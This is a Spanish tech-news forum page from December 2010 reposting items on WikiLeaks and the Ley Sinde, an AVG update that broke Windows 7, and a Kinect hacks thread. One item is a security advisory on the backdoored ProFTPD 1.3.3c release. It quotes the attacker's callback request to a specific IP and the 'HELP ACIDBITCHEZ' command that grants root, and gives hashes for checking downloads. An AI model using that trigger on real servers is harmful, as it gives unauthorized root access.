Las revelaciones y evidencias mostradas por WikiLeaks no parecen tener límite. Aunque todavía no tenemos todos los detalles de la información, en el ingente documento filtrado la última semana se podría demostrar la influencia y presión por parte de Estados Unidos con el Gobierno español para sacar adelante la conocida como Ley Sinde.

Estados Unidos modela, España obedece y aprueba. Esta premisa podría confirmarse cuando se revelen los 115 mensajes con la etiqueta KIPR (propiedad intelectual) referentes a la ley antidescargas española que encara su recta final en el Parlamento para ser aprobada y entrar en vigor en apenas unos meses.

Entre los miles de documentos filtrados y que poco a poco están publicando una serie de periódicos por todo el mundo (El País en España) se encontrarían más de un centenar que harían referencia a la Ley de Economía Sostenible según ha dado a conocer el abogado experto en propiedad intelectual Javier de la Cueva. Estos papeles, propiedad de Estados Unidos serían "tremendamente molestos para el Gobierno".

El País asegura que publicará los documentos "a su debido tiempo"

Sin embargo, aunque desde El País se ha asegurado a De la Cueva que se está trabajando para publicar este contenido, podría no llegar a ver la luz ante una posible amenaza de Estados Unidos, propietarios de los derechos de autor de los papeles, que demandaría al diario español para evitar la publicación. Tal y como expresa afirma el abogado, "al tratarse de una infracción de los derechos de propiedad intelectual en Internet, el órgano competente para decidir sería una Comisión del Ministerio de Cultura, esto es, un órgano dependiente del Gobierno al que no le interesaría bajo ningún concepto la publicación de sus vergüenzas".

El abogado y la comunidad internauta ya han urgido a medios extranjeros a publicar los documentos ante la inminente aprobación de una ley, aunque desde El País se ha insistido en que se revelarán "a su debido tiempo". Esperemos que si realmente se demuestra la injerencia de Estados Unidos en la política española y en un aspecto tan controvertido como la libertad en Internet y la propiedad intelectual se depuren de algún modo responsabilidades y se revise por completo una ley que ha suscitado enorme polémica y críticas entre los usuarios.

Fuente:http://www.adslzone.net/article5030-wikileaks-podria-demostrar-las-presiones-de-eeuu-al-gobierno-para-aprobar-la-ley-sinde.html
#41
En la cuenta de Twitter de Wikileaks se afirma que Everydns ha "matado" su dominio wikileaks.org, argumentando supuestos ataques de denegación de servicio. El dominio sigue registrado a su nombre, así que wikileaks.org volverá a funcionar cuando se propaguen los registros de DNS. En el mismo orden de cosas, Amazon justifica ahora el haber cortado el servicio de Wikileaks diciendo que vulneraban los términos del servicio al publicar material del que no tenían los derechos. Como recuerda Rob Beschizza en BoingBoing, los documentos producidos por el gobierno de los EEUU no están sujetos a copyright. Y filtrar documentos clasificados es delito, pero recibirlos y publicarlos no lo es.

Fuente:http://ciberderechos.barrapunto.com/article.pl?sid=10/12/03/0846232
#42
Se ha informado que la última actualización liberada por AVG (271.1.1/3292 (432/3292)) estaría causando problemas en Windows 7, específicamente en su versión de 64bits. Dentro de este grupo, también se ha establecido que la falla no estaría afectando al 100% de los usuarios de este Antivirus.

Luego de instalar esta actualización y reiniciar, Windows es capaz de bootear entregando el siguiente error:

"Stop: c0000135 The program can't start because %hs is missing from your computer. Try reinstalling the program to fix this problem."

La compañía ya ha entregado algunas posibles formas de solucionar el problema, las cuales consisten en:

  • Reiniciar en modo seguro, y restaurar el sistema hasta una fecha anterior a la instalación de la actualización. Luego reinstalar AVG.
  • De no ser posible bootear en modo seguro, AVG recomienda usar el su disco de reparación y renombrar la carpeta donde se encuentra instalado el Antivirus.
  • Por último, utilizar el sistema de reparación que incluye Windows 7.

La mencionada actualización ya no se encuentra dentro de los servidores de AVG, por lo que si tu PC no tuvo problema alguno, puedes seguir actualizando sin problemas.

La compañía ya está trabajando en una herramienta que facilite a los usuarios resolver el problema.

Fuente:http://www.chw.net/2010/12/actualizacion-de-avg-2011-causa-problemas-en-windows-7/
#43
Después de que Amazon se rehusara a alojar a WikiLeaks, el sitio ha debido cambiar nuevamente de opción de servidores, y esta vez se habría ido a Francia, de acuerdo a lo que dice Gizmodo France.

De acuerdo a la IP que consiguió el sitio, el servidor corresponde al pueblo de Roubaix, donde la compañía de internet OVH tiene servidores.

OVH compartirá así la carga de tráfico (y los ataques de denegación de servicio) con los servidores que WikiLeaks ya tiene en un búnker nuclear en Suecia.

Fuente:http://www.fayerwayer.com/2010/12/wikileaks-estaria-alojado-ahora-en-francia
Relacionado:http://foro.elhacker.net/noticias/amazon_echa_a_wikileaks_de_sus_servidores_presionado_por_ee_uu-t312431.0.html
#44
Este pasado domingo 28 de noviembre el servidor principal de distribución de ficheros del proyecto ProFTPD se ha visto comprometido y la versión 1.3.3c reemplazada por otra con una puerta trasera.

ProFTP es un popular servidor FTP promocionado como estable y seguro, ampliamente configurable y de diseño modular, permitiendo de esta forma escribir extensiones como cifrado SSL/TLS, RADIUS, LDAP o SQL.

Según parece, el atacante empleó para acceder al servidor una vulnerabilidad no corregida en el propio demonio FTP. De esta forma pudo reemplazar los ficheros fuente para la versión ProFTPD 1.3.3c con una versión modificada conteniendo una puerta trasera.

Todavía no está claro qué vulnerabilidad usaron los atacantes para acceder. Si fuera un fallo conocido, esto indicaría que ProFTPD no ha parcheado sus propios servidores a tiempo, dando un pésimo ejemplo. Si fuera desconocida y solo la pudiesen utilizar los atacantes, no tendrían necesidad de troyanizar la distribución central de ProFTPD, puesto que ese fallo ya les permitiría de por sí tener acceso a los servidores. Habrá que esperar aclaraciones.

La modificación no autorizada del código fuente fue advertida por Jeroen Geilman el miércoles 1 de diciembre y solucionada posteriormente.

El servidor actúa como site principal para el proyecto ProFTPD así como servidor de distribución rsync para todos los servidores espejo. Esto implica que cualquier persona que se haya descargado la versión ProFTPD 1.3.3c de uno de los espejos oficiales entre los días 28 de noviembre y 1 de diciembre están afectados por este problema.

La puerta trasera introducida por los atacantes permiten acceso remoto con permisos de root a usuarios no autenticados en los sistemas que estén ejecutando la versión modificada del demonio ProFTPD dándole al atacante control total sobre el sistema.

El atacante ha realizado dos cambios en el programa. En primer lugar, el ProFTPD troyanizado se pone en contacto con la dirección IP 212.26.42.47 en el puerto 9090, y realiza una petición

GET /AB HTTP/1.0

Con esta petición en los logs, el atacante ya sabe qué máquina ha usado su ProFTPD troyanizado y dónde acudir. En segundo lugar, el atacante se conecta a ese servidor por FTP y escribe:

HELP ACIDBITCHEZ

Lo que le dará acceso root. La palabra ACIDBITCHEZ ha sido arbitrariamente elegida por el atacante.

Se recomienda a los usuarios que estén ejecutando dicha versión que comprueben si sus sistemas se han visto comprometidos y compilen o ejecuten una versión actualizada del código.

Para verificar la integridad de los ficheros fuente, se recomienda el uso de las firmas GPG disponibles tanto en los diferentes servidores FTP así como en la página oficial del proyecto ProFTPD:

http://www.proftpd.org/md5_pgp.html

Hash MD5:

018e0eb1757d9cea2a0e17f2c9b1ca2d proftpd-1.3.2e.tar.bz2
4ecb82cb1050c0e897d5343f6d2cc1ed proftpd-1.3.2e.tar.gz
8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

Firmas PGP:

proftpd-1.3.2e.tar.bz2.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkuFYtsACgkQt46JP6URl2rqVACgzefr58XHVoh2ARERbkW5qPzb
Qj4AoOwwH55FlS7OM8sBjELT0OhrN0jQ
=E6hR
-----END PGP SIGNATURE-----

proftpd-1.3.2e.tar.gz.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkuFYuAACgkQt46JP6URl2pTVQCeJ7HM7ltLwJwb4TQ3AwT9j36n
/ywAn3rB6HRVDGTF2WuOJgn/dss7VWeV
=G553
-----END PGP SIGNATURE-----

proftpd-1.3.3c.tar.bz2.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkzLAWYACgkQt46JP6URl2qu3QCcDGXD+fRPOdKMp8fHyHI5d12E
83gAoPHBrjTFCz4MKYLhH8qqxmGslR2k
=aLli
-----END PGP SIGNATURE-----

proftpd-1.3.3c.tar.gz.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkzLAW0ACgkQt46JP6URl2ojfQCfXy/hWE8G5mhdhdLpaPUZsofK
pO8Anj+uP0hQcn1E/CEUddI0mezlSCmg
=e8el
-----END PGP SIGNATURE-----

Fuente:http://www.hispasec.com/unaaldia/4422
#45
Foro Libre / Kinect y su driver opensource
2 Diciembre 2010, 13:23 PM
Buenas

Si algo me ha parecido interesante desde que se ha "abierto" el Kinect de Microsoft, es las posibilidades que les esta dando a los desarrolladores y personajes inquietos :xD , los cuales por un modico precio (comparado con lo que podría costarles otros sistemas) ahora tienen la posibilida de hacer volar la imaginación.

Y el post es para ... colgar videos de cosas curiosas que se han ido creando que se encuentren en la red :P

Video 3D

Kinect + ROS (Robot Operating System)

Reconocimiento de objetos

DepthJS: Kinect + Computer Vision + javascript

Kinect con un emulador

"Camuflaje Invisible"

¿Alguno más? :D , Creo que aunque no tengo un xbox tengo ganas de comprar uno de estos ;D

Saludos